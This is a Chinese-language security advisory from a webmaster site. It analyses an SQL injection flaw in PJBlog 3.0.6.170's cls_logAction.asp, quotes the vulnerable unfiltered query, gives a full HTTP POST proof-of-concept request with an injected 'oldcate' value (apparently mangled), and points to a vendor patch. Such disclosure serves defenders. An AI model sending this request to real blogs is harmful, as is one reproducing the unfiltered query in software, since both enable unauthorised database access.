首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞

所属分类: 网络安全 / 漏洞分析 阅读数: 147
收藏 0 赞 0 分享
影响版本:PJBlog 3.0.6.170
程序介绍:
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。


漏洞分析:
在文件class/cls_logAction.asp中:

oldcate=request.form("oldcate") //第429行
oldctype=request.form("oldtype")

D = conn.execute("select cate_Part from blog_Category where cate_ID="&oldcate)(0)程序没有对变量oldcate做任何过滤放入sql查询语句中,导致注入漏洞的产生。

漏洞利用:

POST /blogedit.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://127.0.0.1/blogedit.asp?id=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)
Host: 127.0.0.1
Content-Length: 513
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=96992031.4542583209449947600.1239335726.1240296350.1240324232.7; __utmz=96992031.1239335726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PJBlog3Setting=ViewType=normal; PJBlog3=memRight=111111111111&memHashKey=c80f369e20b317566f736dbc70839834745d9c20&memName=

admin&exp=2010%2D4%2D21; ASPSESSIONIDCCDSDABA=OEBBHCODJFKIJEGKGCPHGMCP

id=1&log_editType=1&action=post&log_IsDraft=False&title=xxx&log_CateID=3&cname=xxx&ctype=0&oldcname=

xxx&oldtype=0&oldcate=3201=1&log_weather=sunny&log_Level=level3&log_comorder=1&blog_pws=

0&log_Readpw=&log_Pwtips=&c_pws=0&blog_Meta=0&evio_KeyWords=xxx&evio_Description=

web+safe&log_From=%E6%9C%AC%E7%AB%99%E5%8E%9F%E5%88%9B&log_FromURL=http%3A%2F%2Flocalhost%2Fbackci%2F&PubTimeType=com&PubTime=2009-4-21+15%3A54%3A46&tags=&UBBfonts=&UBBfonts=&UBBfonts=&UBBmethod=on&Message=web+safe&log_Intro=

web+safe&log_Quote=解决方案:
厂商补丁:
PJblog
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://bbs.pjhome.net/thread-52214-1-1.html
更多精彩内容其他人还在看

Uread阅读器拒绝服务漏洞的分析与解决

Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
收藏 0 赞 0 分享

淇晨科技网站管理系統默认漏洞的分析

分析一下一个网站的漏洞
收藏 0 赞 0 分享

Kesion cms注入漏洞分析及其修复方案

Kesion cms注入漏洞.我们来分析一下
收藏 0 赞 0 分享

中关村在线博客子站SQL注入及修复方案

分析一下中关村的博客的漏洞
收藏 0 赞 0 分享

时时送订单系统后台登陆框post注入的方法介绍以及修复方案

通过post注入来研究一下漏洞
收藏 0 赞 0 分享

KindEditor上传解析漏洞、列目录、内容漏洞

KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,但是安全问题也不容忽视,下面来简单分析下
收藏 0 赞 0 分享

服务器上网站被挂Iframe木马的解决方法

今天访问公司的一个网站,突然发现网页显示不对,右键查看HTML代码,发现iframe了一个网站的js文件,不用说,肯定被挂马了
收藏 0 赞 0 分享

WordPress 4.0以下版本存在跨站脚本漏洞

WordPress是著名的开源CMS(内容管理)系统。近日,在4.0版本以下的Wordpress被发现存在跨站脚本漏洞(XSS),新版本的Wordpress已经修复了这些问题。为了安全起见,建议站长们尽早更新到WP新版本。
收藏 0 赞 0 分享

历史悠久的3个经典网站安全漏洞介绍

这篇文章主要介绍了历史悠久的3个经典网站安全漏洞介绍,互联网项目里边,SQL注入漏洞、XSS漏洞和猜测URL攻击这三个漏洞可谓历史悠久,本文就一一介绍了它们的原理等,需要的朋友可以参考下
收藏 0 赞 0 分享

Kindeditor遍历目录0DAY问题

KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 www.zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22